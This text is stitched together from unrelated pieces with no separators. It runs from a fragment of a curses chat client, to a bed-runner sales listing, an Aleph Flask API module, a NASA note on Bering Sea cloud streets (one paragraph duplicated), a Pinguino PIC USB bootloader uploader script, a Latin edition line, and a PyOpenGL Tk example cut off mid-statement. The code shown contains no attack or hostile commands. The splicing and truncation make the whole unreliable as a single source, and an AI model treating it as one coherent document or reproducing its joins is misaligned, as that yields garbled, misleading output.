curses.newwin(3, 120, 23, 0) sendbox.box() sendbox.refresh() logbox = curses.newwin(35, 120, 27, 0) logbox.box() logbox.refresh() screen.addstr(63, 1, "F5 - (re)connect") screen.addstr(" | END - close") screen.addstr(64, 1, "F6 - disconnect") while True: logLength, box = write2Box(logbox, log2Write, logLength, 35) box.refresh() chatLength, box = write2Box(chatbox, chat2Write, chatLength, 20) box.refresh() lengthToSend = len(tosend) if lengthToSend <> lastToSendLength: lastToSendLength = lengthToSend sendbox.addstr(1, 1, empty) sendbox.addstr(1, 1, tosend) sendbox.refresh() screen.refresh() def checkKeyboard(): global tosend global closing global sending global screen global disconnecting global listenerConnection key = '' while not closing: key = screen.getch() if key == curses.KEY_END: closing = True elif key == ord('\n'): sending = True elif key == curses.KEY_BACKSPACE: tosend = tosend[:-1] elif key == curses.KEY_F5: connect() elif key == curses.KEY_F6: disconnecting = True log("connection closed _ listener", 2) elif key <= 256: tosend += chr(key) def connect(): global server_address global promoterPort global listenerPort global uuid global disconnecting disconnecting = False start_new_thread(startPromoter, (server_address, promoterPort,)) while uuid == "": time.sleep(1) log("connect with uuid: " + str(uuid), 20) log("prepare listener start", 120) start_new_thread(startListener, (server_address, listenerPort,)) def Main(): global closing global tosend global uuid global listenerConnection global promoterConnection start_new_thread(printScreen, ()) start_new_thread(checkKeyboard, ()) connect() while not closing: pass time.sleep(1) listenerConnection.close() promoterConnection.close() curses.endwin() Main()
This listing is for this fabulous cream colored floral designed bed runner. Could also be used a couch runner or even a shawl. In great condition with just a few areas of coloration that is not really noticeable. Overall, no tears or miss stitching and has the original personalized tag on the back. A great piece to own! Delivered quickly! Will be a perfect wedding gift. Thankyou!
import os import logging from time import time from apikit import jsonify from flask import render_template, current_app, Blueprint, request from jsonschema import ValidationError from elasticsearch import TransportError from aleph.core import get_config from aleph.model.constants import CORE_FACETS, SOURCE_CATEGORIES from aleph.model.constants import COUNTRY_NAMES, LANGUAGE_NAMES from aleph.model.validation import resolver from aleph.views.cache import enable_cache blueprint = Blueprint('base_api', __name__) log = logging.getLogger(__name__) def angular_templates(): templates = {} template_dirs = [current_app.static_folder] template_dirs.extend(get_config('CUSTOM_TEMPLATES_DIR')) for template_dir in template_dirs: for tmpl_set in ['templates', 'help']: tmpl_dir = os.path.join(template_dir, tmpl_set) for (root, dirs, files) in os.walk(tmpl_dir): for file_name in files: file_path = os.path.join(root, file_name) with open(file_path, 'rb') as fh: file_name = file_path[len(template_dir) + 1:] templates[file_name] = fh.read().decode('utf-8') return templates.items() @blueprint.route('/search') @blueprint.route('/help') @blueprint.route('/help/<path:path>') @blueprint.route('/entities') @blueprint.route('/entities/<path:path>') @blueprint.route('/crawlers') @blueprint.route('/crawlers/logs') @blueprint.route('/tabular/<path:path>') @blueprint.route('/text/<path:path>') @blueprint.route('/') def ui(**kwargs): enable_cache(server_side=True) return render_template("layout.html", templates=angular_templates()) @blueprint.route('/api/1/metadata') def metadata(): enable_cache(server_side=False) schemata = {} for schema_id, schema in resolver.store.items(): if not schema_id.endswith('#'): schema_id = schema_id + '#' schemata[schema_id] = { 'id': schema_id, 'title': schema.get('title'), 'faIcon': schema.get('faIcon'), 'plural': schema.get('plural', schema.get('title')), 'description': schema.get('description'), 'inline': schema.get('inline', False) } return jsonify({ 'status': 'ok', 'fields': CORE_FACETS, 'source_categories': SOURCE_CATEGORIES, 'countries': COUNTRY_NAMES, 'languages': LANGUAGE_NAMES, 'schemata': schemata }) @blueprint.app_errorhandler(403) def handle_authz_error(err): return jsonify({ 'status': 'error', 'message': 'You are not authorized to do this.', 'roles': request.auth_roles, 'user': request.auth_role }, status=403) @blueprint.app_errorhandler(ValidationError) def handle_validation_error(err): return jsonify({ 'status': 'error', 'message': err.message }, status=400) @blueprint.app_errorhandler(TransportError) def handle_es_error(err): return jsonify({ 'status': 'error', 'message': err.error, 'info': err.info.get('error', {}).get('root_cause', [])[-1] }, status=400)
Ice, wind, cold temperatures and ocean waters combined to created dramatic cloud formations over the Bering Sea in late January, 2015. The Moderate Resolution Imaging Spectroradiometer (MODIS) aboard NASA's Aqua satellite passed over the region and captured this true-color image on Jan. 23. Ice, wind, cold temperatures and ocean waters combined to created dramatic cloud formations over the Bering Sea in late January, 2015. The Moderate Resolution Imaging Spectroradiometer (MODIS) aboard NASA’s Aqua satellite passed over the region and captured this true-color image on Jan. 23. The frozen tundra of Russia lies in the northwest of the image, and snow-covered Alaska lies in the northeast. Sea ice extends from the land well into the Bering Sea. Over the dark water bright white clouds line in up close, parallel rows. These formations are known as “cloud streets”. Air blowing over the cold, snowy land and then over ice becomes both cold and dry. When the air then moves over relatively warmer and much moister water and lead to the development of parallel cylinders of spinning air. On the upper edge of these cylinders of air, where the air is rising, small clouds form. Where air is descending, the skies are clear. This clear/cloudy pattern, formed in parallel rows, gives the impression of streets. The clouds begin over the sea ice, but they primarily hang over open ocean. The streets are neat and in tight rows closest to land, while further over the Bering Sea the pattern widens and begins to become more random. The rows of clouds are also not perfectly straight, but tend to curve. The strength and direction of the wind helps create these features: where the wind is strongest, nearest to shore, the clouds line up most neatly. The clouds align with the wind direction, so the direction of the streets gives strong clues to prevailing wind direction.
#!/usr/bin/env python #-*- coding: iso-8859-15 -*- """--------------------------------------------------------------------- _____ _____ _ _ _____ _ _ _____ _ _ ____ | __ \_ _| \ | |/ ____| | | |_ _| \ | |/ __ \ | |__) || | | \| | | __| | | | | | | \| | | | | | ___/ | | | . ` | | |_ | | | | | | | . ` | | | | | | _| |_| |\ | |__| | |__| |_| |_| |\ | |__| | |_| _|_____|_| \_|\_____|\____/|_____|_| \_|\____/ | | | | | | ___| |_ __ _ _ __ __| | __ _| | ___ _ __ ___ / __| __/ _` | '_ \ / _` |/ _` | |/ _ \| '_ \ / _ \ \__ \ || (_| | | | | (_| | (_| | | (_) | | | | __/ |___/\__\__,_|_| |_|\__,_|\__,_|_|\___/|_| |_|\___| ___ _ _ _ _ _ _ _ / _ \ | | (_) | | | | | | | | | | (_) |_____| |__ _| |_ | | | |_ __ | | ___ __ _ __| | ___ _ __ > _ <______| '_ \| | __| | | | | '_ \| |/ _ \ / _` |/ _` |/ _ \ '__| | (_) | | |_) | | |_ | |__| | |_) | | (_) | (_| | (_| | __/ | \___/ |_.__/|_|\__| \____/| .__/|_|\___/ \__,_|\__,_|\___|_| | | |_| Author: Regis Blanchot <[email protected]> -------------------------------------------------------------------- 2013-11-13 - RB - first release 2015-09-08 - RB - fixed numBlocks > numBlocksMax when used with XC8 2016-08-27 - RB - added PIC16F145x support 2016-08-28 - RB - added Python3 support 2016-08-29 - RB - added usb.core functions (PYUSB_USE_CORE) 2016-11-23 - RB - changed constant writeBlockSize to variable writeBlockSize -------------------------------------------------------------------- This library is free software you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc. 51 Franklin Street, Fifth Floor Boston, MA 02110-1301 USA ---------------------------------------------------------------------""" #----------------------------------------------------------------------- # Usage: uploader8.py mcu path/filename.hex # Ex : uploader8.py 16F1459 tools/Blink1459.hex #----------------------------------------------------------------------- # This class is based on : # - Diolan USB bootloader licenced (LGPL) by Diolan <http://www.diolan.com> # - jallib USB bootloader licenced (BSD) by Albert Faber # See also PyUSB Doc. http://wiki.erazor-zone.de/wiki:projects:python:pyusb:pydoc # Pinguino Device Descriptors : lsusb -v -d 04d8:feaa #----------------------------------------------------------------------- # Debug: export PYUSB_DEBUG=debug #----------------------------------------------------------------------- import sys import os import usb #import usb.core #import usb.util # PyUSB Core module switch #----------------------------------------------------------------------- PYUSB_USE_CORE = 1 # 0=legacy, 1=core # Globales #----------------------------------------------------------------------- # 8-bit Pinguino's ID #----------------------------------------------------------------------- VENDOR_ID = 0x04D8 # Microchip License PRODUCT_ID = 0xFEAA # Pinguino Sub-License # Hex format record types #----------------------------------------------------------------------- Data_Record = 0 End_Of_File_Record = 1 Extended_Segment_Address_Record = 2 Start_Segment_Address_Record = 3 Extended_Linear_Address_Record = 4 Start_Linear_Address_Record = 5 # usbBuf Data Packet Structure #----------------------------------------------------------------------- # __________________ # | COMMAND | 0 [BOOT_CMD] # | LEN/SIZE | 1 [BOOT_CMD_LEN] or [BOOT_SIZE] # | ADDRL | 2 [BOOT_ADDR_LO] or [BOOT_VER_MINOR] # | ADDRH | 3 [BOOT_ADDR_HI] or [BOOT_VER_MAJOR ] # | ADDRU | 4 [BOOT_ADDR_UP] # | | 5 [BOOT_DATA_START] or [BOOT_DEV1] or [BOOT_REV1] # | | 6 [BOOT_DEV2] or [BOOT_REV2] # . . # . DATA . # . . # | | 62 # |________________| 63 # #----------------------------------------------------------------------- BOOT_CMD = 0 BOOT_CMD_LEN = 1 BOOT_ADDR_LO = 2 BOOT_ADDR_HI = 3 BOOT_ADDR_UP = 4 BOOT_DATA_START = 5 BOOT_SIZE = 1 BOOT_VER_MINOR = 2 BOOT_VER_MAJOR = 3 BOOT_REV1 = 5 BOOT_REV2 = 6 BOOT_DEV1 = 7 BOOT_DEV2 = 8 # Bootloader commands #----------------------------------------------------------------------- READ_VERSION_CMD = 0x00 READ_FLASH_CMD = 0x01 WRITE_FLASH_CMD = 0x02 ERASE_FLASH_CMD = 0x03 #READ_EEDATA_CMD = 0x04 #WRITE_EEDATA_CMD = 0x05 #READ_CONFIG_CMD = 0x06 #WRITE_CONFIG_CMD = 0x07 RESET_CMD = 0xFF # USB Max. Packet size #----------------------------------------------------------------------- MAXPACKETSIZE = 64 # Bulk endpoints #----------------------------------------------------------------------- IN_EP = 0x81 # endpoint for Bulk reads OUT_EP = 0x01 # endpoint for Bulk writes # Configuration #----------------------------------------------------------------------- ACTIVE_CONFIG = 0x01 INTERFACE_ID = 0x00 TIMEOUT = 10000 # Error codes returned by various functions #----------------------------------------------------------------------- ERR_NONE = 0 ERR_CMD_ARG = 1 ERR_CMD_UNKNOWN = 2 ERR_DEVICE_NOT_FOUND = 3 ERR_USB_INIT1 = 4 ERR_USB_INIT2 = 5 ERR_USB_OPEN = 6 ERR_USB_WRITE = 7 ERR_USB_READ = 8 ERR_HEX_OPEN = 9 ERR_HEX_STAT = 10 ERR_HEX_MMAP = 11 ERR_HEX_SYNTAX = 12 ERR_HEX_CHECKSUM = 13 ERR_HEX_RECORD = 14 ERR_VERIFY = 15 ERR_EOL = 16 ERR_USB_ERASE = 17 # Table with supported USB devices # device_id:[PIC name, flash size(in bytes), eeprom size (in bytes)] #----------------------------------------------------------------------- devices_table = \ { # 16F 0x3020: ['16f1454' , 0x02000, 0x00 ], 0x3021: ['16f1455' , 0x02000, 0x00 ], 0x3023: ['16f1459' , 0x02000, 0x00 ], 0x3024: ['16lf1454' , 0x02000, 0x00 ], 0x3025: ['16lf1455' , 0x02000, 0x00 ], 0x3027: ['16lf1459' , 0x02000, 0x00 ], # 18F 0x4740: ['18f13k50' , 0x02000, 0x80 ], 0x4700: ['18lf13k50' , 0x02000, 0x80 ], 0x4760: ['18f14k50' , 0x04000, 0xff ], 0x4720: ['18f14k50' , 0x04000, 0xff ], 0x2420: ['18f2450' , 0x04000, 0x00 ], 0x1260: ['18f2455' , 0x06000, 0xff ], 0x2a60: ['18f2458' , 0x06000, 0xff ], 0x4c00: ['18f24j50' , 0x04000, 0x00 ], 0x4cc0: ['18lf24j50' , 0x04000, 0x00 ], 0x1240: ['18f2550' , 0x08000, 0xff ], 0x2a40: ['18f2553' , 0x08000, 0xff ], 0x4c20: ['18f25j50' , 0x08000, 0x00 ], 0x4ce0: ['18lf25j50' , 0x08000, 0x00 ], 0x5c20: ['18f25k50' , 0x08000, 0xff ], 0x5ca0: ['18lf25k50' , 0x08000, 0xff ], 0x4c40: ['18f26j50' , 0x10000, 0x00 ], 0x4d00: ['18lf26j50' , 0x10000, 0x00 ], 0x5860: ['18f27j53' , 0x20000, 0x00 ], 0x1200: ['18f4450' , 0x04000, 0x00 ], 0x1220: ['18f4455' , 0x06000, 0x00 ], 0x2a20: ['18f4458' , 0x06000, 0xff ], 0x4c60: ['18f44j50' , 0x04000, 0x00 ], 0x4d20: ['18lf44j50' , 0x04000, 0x00 ], 0x1200: ['18f4550' , 0x08000, 0xff ], 0x2a00: ['18f4553' , 0x08000, 0xff ], 0x4c80: ['18f45j50' , 0x08000, 0x00 ], 0x4d40: ['18lf45j50' , 0x08000, 0x00 ], 0x5C00: ['18f45k50' , 0x08000, 0xff ], 0x5C80: ['18lf45k50' , 0x08000, 0xff ], 0x4ca0: ['18f46j50' , 0x10000, 0x00 ], 0x4d60: ['18f46j50' , 0x10000, 0x00 ], 0x58e0: ['18f47j53' , 0x20000, 0x00 ], 0x4100: ['18f65j50' , 0x08000, 0x00 ], 0x1560: ['18f66j50' , 0x10000, 0x00 ], 0x4160: ['18f66j55' , 0x18000, 0x00 ], 0x4180: ['18f67j50' , 0x20000, 0x00 ], 0x41a0: ['18f85j50' , 0x08000, 0x00 ], 0x41e0: ['18f86j50' , 0x10000, 0x00 ], 0x1f40: ['18f86j55' , 0x18000, 0x00 ], 0x4220: ['18f87j50' , 0x20000, 0x00 ] } # ---------------------------------------------------------------------- def getDevice(vendor, product): # ---------------------------------------------------------------------- """ search USB device and returns a DeviceHandle object """ if PYUSB_USE_CORE: device = usb.core.find(idVendor=vendor, idProduct=product) #print(device) if device is None : return ERR_DEVICE_NOT_FOUND else : return device else: busses = usb.busses() for bus in busses: #print(bus) for device in bus.devices: #print(device) if (device.idVendor, device.idProduct) == (vendor, product): return device return ERR_DEVICE_NOT_FOUND # ---------------------------------------------------------------------- def initDevice(device): # ---------------------------------------------------------------------- """ init pinguino device """ if PYUSB_USE_CORE: if os.getenv("PINGUINO_OS_NAME") == "linux": try: active = device.is_kernel_driver_active(INTERFACE_ID) except usb.core.USBError as e: sys.exit("Aborting: could not detach kernel driver: %s" % str(e)) if active : #print("Kernel driver detached") try: device.detach_kernel_driver(INTERFACE_ID) except usb.core.USBError as e: sys.exit("Aborting: could not detach kernel driver: %s" % str(e)) #else: #print("No kernel driver attached") # The call to set_configuration must come before # claim_interface (which, btw, is optional). try: device.set_configuration(ACTIVE_CONFIG) except usb.core.USBError as e: sys.exit("Aborting: could not set configuration: %s" % str(e)) try: usb.util.claim_interface(device, INTERFACE_ID) except usb.core.USBError as e: sys.exit("Aborting: could not claim interface: %s" % str(e)) return device else: handle = device.open() if handle: #print(handle) try: handle.detachKernelDriver(INTERFACE_ID) except: #print("Could not detatch kernel driver from interface") pass try: handle.setConfiguration(ACTIVE_CONFIG) except: sys.exit("Aborting: could not set configuration") try: handle.claimInterface(INTERFACE_ID) except: #print("Could not claim interface") pass return handle return ERR_USB_INIT1 # ---------------------------------------------------------------------- def closeDevice(handle): # ---------------------------------------------------------------------- """ Close currently-open USB device """ if PYUSB_USE_CORE: usb.util.release_interface(handle, INTERFACE_ID) else: handle.releaseInterface() # ---------------------------------------------------------------------- def sendCommand(handle, usbBuf): # ---------------------------------------------------------------------- """ send command to the bootloader """ if PYUSB_USE_CORE: sent_bytes = handle.write(OUT_EP, usbBuf, TIMEOUT) else: sent_bytes = handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) if sent_bytes != len(usbBuf): return ERR_USB_WRITE if PYUSB_USE_CORE: return handle.read(IN_EP, MAXPACKETSIZE, TIMEOUT) else: return handle.bulkRead(IN_EP, MAXPACKETSIZE, TIMEOUT) # ---------------------------------------------------------------------- def resetDevice(handle): # ---------------------------------------------------------------------- """ send reset command to the bootloader """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = RESET_CMD # write data packet if PYUSB_USE_CORE: handle.write(OUT_EP, usbBuf, TIMEOUT) else: handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) #usbBuf = sendCommand(handle, usbBuf) #print usbBuf #handle.reset() # ---------------------------------------------------------------------- def getVersion(handle): # ---------------------------------------------------------------------- """ get bootloader version """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = READ_VERSION_CMD # write data packet and get response usbBuf = sendCommand(handle, usbBuf) if usbBuf == ERR_USB_WRITE: return ERR_USB_WRITE else: # major.minor return str(usbBuf[BOOT_VER_MAJOR]) + "." + \ str(usbBuf[BOOT_VER_MINOR]) # ---------------------------------------------------------------------- def getDeviceID(handle, proc): # ---------------------------------------------------------------------- """ read 2-byte device ID from PIC18F : 0x3FFFFE PIC16F : 0x8005 """ #print(proc) if ("16f" in proc): # REVISION & DEVICE ID usbBuf = readFlash(handle, 0x8005, 4) if usbBuf == ERR_USB_WRITE or usbBuf is None: return ERR_USB_WRITE, ERR_USB_WRITE rev1 = usbBuf[BOOT_REV1] rev2 = usbBuf[BOOT_REV2] device_rev = (int(rev2) << 8) + int(rev1) dev1 = usbBuf[BOOT_DEV1] dev2 = usbBuf[BOOT_DEV2] device_id = (int(dev2) << 8) + int(dev1) else: # REVISION & DEVICE ID usbBuf = readFlash(handle, 0x3FFFFE, 2) #print usbBuf if usbBuf == ERR_USB_WRITE or usbBuf is None: return ERR_USB_WRITE, ERR_USB_WRITE #print("BUFFER =", usbBuf dev1 = usbBuf[BOOT_REV1] #print("DEV1 =", dev1 dev2 = usbBuf[BOOT_REV2] #print("DEV2 =", dev2 device_id = (int(dev2) << 8) + int(dev1) device_id = device_id & 0xFFE0 #print device_id device_rev = device_id & 0x001F #print device_rev return device_id, device_rev # ---------------------------------------------------------------------- def getDeviceFlash(device_id): # ---------------------------------------------------------------------- """ get flash memory info """ for n in devices_table: if n == device_id: return devices_table[n][1] return ERR_DEVICE_NOT_FOUND # ---------------------------------------------------------------------- def getDeviceName(device_id): # ---------------------------------------------------------------------- """ get device chip name """ for n in devices_table: if n == device_id: return devices_table[n][0] return ERR_DEVICE_NOT_FOUND # ---------------------------------------------------------------------- def eraseFlash(handle, address, numBlocks): # ---------------------------------------------------------------------- """ erase n * 64- or 1024-byte blocks of flash memory """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = ERASE_FLASH_CMD # number of blocks to erase usbBuf[BOOT_SIZE] = numBlocks # 1rst block address # NB : must be divisible by 64 or 1024 depending on PIC model usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF # write data packet if PYUSB_USE_CORE: handle.write(OUT_EP, usbBuf, TIMEOUT) else: handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) #return sendCommand(handle, usbBuf) # ---------------------------------------------------------------------- def readFlash(handle, address, length): # ---------------------------------------------------------------------- """ read a block of flash """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = READ_FLASH_CMD # size of block usbBuf[BOOT_CMD_LEN] = length # address usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF # send request to the bootloader return sendCommand(handle, usbBuf) # ---------------------------------------------------------------------- def writeFlash(handle, address, datablock): # ---------------------------------------------------------------------- """ write a block of code first 5 bytes are for block description (BOOT_CMD, BOOT_CMD_LEN and BOOT_ADDR) data block size should be of writeBlockSize bytes total length is then writeBlockSize + 5 < MAXPACKETSIZE """ usbBuf = [0xFF] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = WRITE_FLASH_CMD # size of block usbBuf[BOOT_CMD_LEN] = len(datablock) # block's address usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF # add data to the packet #for i in range(len(datablock)): # usbBuf[BOOT_DATA_START + i] = datablock[i] usbBuf[BOOT_DATA_START:] = datablock #print usbBuf # write data packet on usb device if PYUSB_USE_CORE: handle.write(OUT_EP, usbBuf, TIMEOUT) else: handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) #return sendCommand(handle, usbBuf) # ---------------------------------------------------------------------- def hexWrite(handle, filename, proc, memstart, memend): # ---------------------------------------------------------------------- """ Parse the Hex File Format and send data to usb device [0] Start code, one character, an ASCII colon ':'. [1:3] Byte count, two hex digits. [3:7] Address, four hex digits, a 16-bit address of the beginning of the memory position for the data. Limited to 64 kilobytes, the limit is worked around by specifying higher bits via additional record types. This address is big endian. [7:9] Record type, two hex digits, 00 to 05, defining the type of the data field. [9:*] Data, a sequence of n bytes of the data themselves, represented by 2n hex digits. [*:*] Checksum, two hex digits - the least significant byte of the two's complement of the sum of the values of all fields except fields 1 and 6 (Start code ":" byte and two hex digits of the Checksum). It is calculated by adding together the hex-encoded bytes (hex digit pairs), then leaving only the least significant byte of the result, and making a 2's complement (either by subtracting the byte from 0x100, or inverting it by XOR-ing with 0xFF and adding 0x01). If you are not working with 8-bit variables, you must suppress the overflow by AND-ing the result with 0xFF. The overflow may occur since both 0x100-0 and (0x00 XOR 0xFF)+1 equal 0x100. If the checksum is correctly calculated, adding all the bytes (the Byte count, both bytes in Address, the Record type, each Data byte and the Checksum) together will always result in a value wherein the least significant byte is zero (0x00). For example, on :0300300002337A1E 03 + 00 + 30 + 00 + 02 + 33 + 7A = E2, 2's complement is 1E """ # Addresses are doubled in the PIC16F HEX file if ("16f" in proc): memstart = memstart * 2 memend = memend * 2 #print("memstart = 0x%X" % memstart) #print("memend = 0x%X" % memend) data = [] old_max_address = memstart old_min_address = memend max_address = 0 min_address = 0 address_Hi = 0 codesize = 0 # size of write block # ------------------------------------------------------------------ if "13k50" in proc : writeBlockSize = 8 elif "14k50" in proc : writeBlockSize = 16 else : writeBlockSize = 32 # size of erase block # -------------------------------------------------------------- # Pinguino x6j50 or x7j53, erased blocks are 1024-byte long if ("j" in proc): eraseBlockSize = 1024 # Pinguino x455, x550 or x5k50, erased blocks are 64-byte long else: eraseBlockSize = 64 #print("eraseBlockSize = %d" % eraseBlockSize # image of the whole PIC memory (above memstart) # -------------------------------------------------------------- for i in range(memend - memstart): data.append(0xFF) # read hex file # ------------------------------------------------------------------ hexfile = open(filename,'r') lines = hexfile.readlines() hexfile.close() # calculate checksum, code size and memmax # ------------------------------------------------------------------ for line in lines: byte_count = int(line[1:3], 16) # lower 16 bits (bits 0-15) of the data address address_Lo = int(line[3:7], 16) record_type= int(line[7:9], 16) # checksum calculation (optional if speed is critical) end = 9 + byte_count * 2 # position of checksum at end of line checksum = int(line[end:end+2], 16) cs = 0 i = 1 while i < end: cs = cs + (0x100 - int(line[i:i+2], 16) ) & 0xFF # not(i) i = i + 2 if checksum != cs: return ERR_HEX_CHECKSUM # extended linear address record if record_type == Extended_Linear_Address_Record: # upper 16 bits (bits 16-31) of the data address address_Hi = int(line[9:13], 16) << 16 #print address_Hi # data record elif record_type == Data_Record: # data's 32-bit address calculation address = address_Hi + address_Lo #print("address = %X" % address # min address if (address < old_min_address) and (address >= memstart): min_address = address old_min_address = address #print("min. address : 0x%X" % old_min_address # max address if (address > old_max_address) and (address < memend): max_address = address + byte_count old_max_address = address #print("end_address = %X" % end_address if (address >= memstart) and (address < memend): # code size calculation codesize = codesize + byte_count # append data for i in range(byte_count): if ((address + i) < memend): #Caution : addresses are not always contiguous #data.append(int(line[9 + (2 * i) : 11 + (2 * i)], 16)) #data[address - memstart + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16) data[address - min_address + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16) #print line[9 + (2 * i) : 11 + (2 * i)], # end of file record elif record_type == End_Of_File_Record: break # unsupported record type else: return ERR_HEX_RECORD # max_address must be divisible by eraseBlockSize # ------------------------------------------------------------------ #min_address = min_address - eraseBlockSize - (min_address % eraseBlockSize) max_address = max_address + eraseBlockSize - (max_address % eraseBlockSize) if (max_address > memend): max_address = memend #print("min_address = 0x%X" % min_address #print("max_address = 0x%X" % max_address # erase memory from memstart to max_address # ------------------------------------------------------------------ numBlocksMax = (memend - memstart) / eraseBlockSize numBlocks = (max_address - memstart) / eraseBlockSize #print("memend = %d" % memend #print("memmax = %d" % memmax #print("memstart = %d" % memstart #print("numBlocks = %d" % numBlocks #print("numBlocksMax = %d" % numBlocksMax if numBlocks > numBlocksMax: #numBlocks = numBlocksMax return ERR_USB_ERASE if numBlocks < 256: status = eraseFlash(handle, memstart, numBlocks) if status == ERR_USB_WRITE: return ERR_USB_WRITE else: numBlocks = numBlocks - 255 upperAddress = memstart + 255 * eraseBlockSize # from self.board.memstart to upperAddress status = eraseFlash(handle, memstart, 255) if status == ERR_USB_WRITE: return ERR_USB_WRITE # erase flash memory from upperAddress to memmax status = eraseFlash(handle, upperAddress, numBlocks) if status == ERR_USB_WRITE: return ERR_USB_WRITE # write blocks of writeBlockSize bytes # ------------------------------------------------------------------ for addr8 in range(min_address, max_address, writeBlockSize): index = addr8 - min_address # the addresses are doubled in the PIC16F HEX file if ("16f" in proc): addr16 = addr8 / 2 status = writeFlash(handle, addr16, data[index:index+writeBlockSize]) if status == ERR_USB_WRITE: return ERR_USB_WRITE #print("addr8=0x%X addr16=0x%X" % (addr8, addr16) #print("0x%X [%s]" % (addr16, data[index:index+writeBlockSize]) else: status = writeFlash(handle, addr8, data[index:index+writeBlockSize]) if status == ERR_USB_WRITE: return ERR_USB_WRITE #print("0x%X [%s]" % (addr8, data[index:index+writeBlockSize]) data[:] = [] # clear the list print("%d bytes written" % codesize) return ERR_NONE # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- def main(mcu, filename): # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- # check file to upload # ------------------------------------------------------------------ if filename == '': closeDevice(handle) sys.exit("Aborting: no program to write") hexfile = open(filename, 'r') if hexfile == "": sys.exit("Aborting: unable to open %s" % filename) hexfile.close() # search for a Pinguino board # ------------------------------------------------------------------ print("Looking for a Pinguino board ...") device = getDevice(VENDOR_ID, PRODUCT_ID) if device == ERR_DEVICE_NOT_FOUND: sys.exit("Aborting: Pinguino not found. Is your device connected and/or in bootloader mode ?") else: print("Pinguino found ...") handle = initDevice(device) #print(handle) if handle == ERR_USB_INIT1: print("... but upload is not possible.") print("Press the Reset button and try again.") sys.exit(0) # find out the processor # ------------------------------------------------------------------ mcu = mcu.lower() device_id, device_rev = getDeviceID(handle, mcu) if device_id == ERR_USB_WRITE: closeDevice(handle) sys.exit("Aborting: unknown device ID") proc = getDeviceName(device_id) if proc == ERR_DEVICE_NOT_FOUND: closeDevice(handle) sys.exit("Aborting: unknown PIC (id=0x%X)" % device_id) elif proc != mcu: closeDevice(handle) sys.exit("Aborting: program compiled for %s but device has %s" % (mcu, proc)) else: print(" - with PIC%s (id=0x%X, rev=%x)" % (proc, device_id, device_rev)) # find out flash memory size # ------------------------------------------------------------------ # lower limit of the flash memory (bootloader offset) # TODO : get it from the bootloader (cf. APPSTART) if ("16f" in proc): memstart = 0x800 else: memstart = 0xC00 # upper limit of the flash memory memend = getDeviceFlash(device_id) memfree = memend - memstart; print(" - with %d bytes free (%.2f/%d KB)" % (memfree, memfree/1024, memend/1024)) print(" from 0x%05X to 0x%05X" % (memstart, memend)) # find out bootloader version # ------------------------------------------------------------------ #product = handle.getString(device.iProduct, 30) #manufacturer = handle.getString(device.iManufacturer, 30) print(" - with USB bootloader v%s" % getVersion(handle)) # start writing # ------------------------------------------------------------------ print("Uploading user program ...") status = hexWrite(handle, filename, proc, memstart, memend) #print status if status == ERR_HEX_RECORD: closeDevice(handle) sys.exit("Aborting: record error") elif status == ERR_HEX_CHECKSUM: closeDevice(handle) sys.exit("Aborting: checksum error") elif status == ERR_USB_ERASE: print("Aborting: erase error") closeDevice(handle) sys.exit(0) elif status == ERR_NONE: print("%s successfully uploaded" % os.path.basename(filename)) # reset and start start user's app. # ------------------------------------------------------------------ resetDevice(handle) # Device can't be closed because it just has been reseted #closeDevice(handle) sys.exit("Starting user program ...") else: sys.exit("Aborting: unknown error") # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- if __name__ == "__main__": print("We use Python v%d.%d + PyUSB.%s" % (sys.version_info[0], sys.version_info[1], "core" if PYUSB_USE_CORE else "legacy")) i = -1 for arg in sys.argv: i = i + 1 if i == 2: main(sys.argv[1], sys.argv[2]) else: sys.exit("Usage ex: uploader8.py 16f1459 tools/Blink1459.hex")
Edition originale Tiguri. Sumtibus authoris, typis gessnerianis. MDCCVIII.
#!/usr/bin/env python from __future__ import print_function """ from example by Tarn Weisner Burton <[email protected]> in pyopengl """ __author__ = 'Jon Wright <[email protected]> from example by Tarn Weisner Burton <[email protected]>' import numpy import sys import os from pyopengltk import Opengl import OpenGL.GL as GL import OpenGL.GLU as GLU if sys.version_info[0] < 3: import Tkinter as Tk else: import tkinter as Tk class myOpengl(Opengl): # Make a parallel projection # mostly copied from Tk.Opengl class with small mods def tkRedraw(self, *dummy): """Cause the opengl widget to redraw itself.""" if not self.initialised: return self.activate() #print self.distance GL.glPushMatrix() # Protect our matrix self.update_idletasks() self.activate() w = self.winfo_width() h = self.winfo_height() GL.glViewport(0, 0, w, h) # Clear the background and depth buffer. GL.glClearColor(self.r_back, self.g_back, self.b_back, 0.) GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT) GL.glMatrixMode(GL.GL_PROJECTION) GL.glLoadIdentity() r = 1.*w/h GL.glOrtho( -self.distance*r, self.distance*r, -self.distance, self.distance, -self.distance*3, self.distance*3) # GLU.gluPerspective(self.fovy, float(w)/float(h), 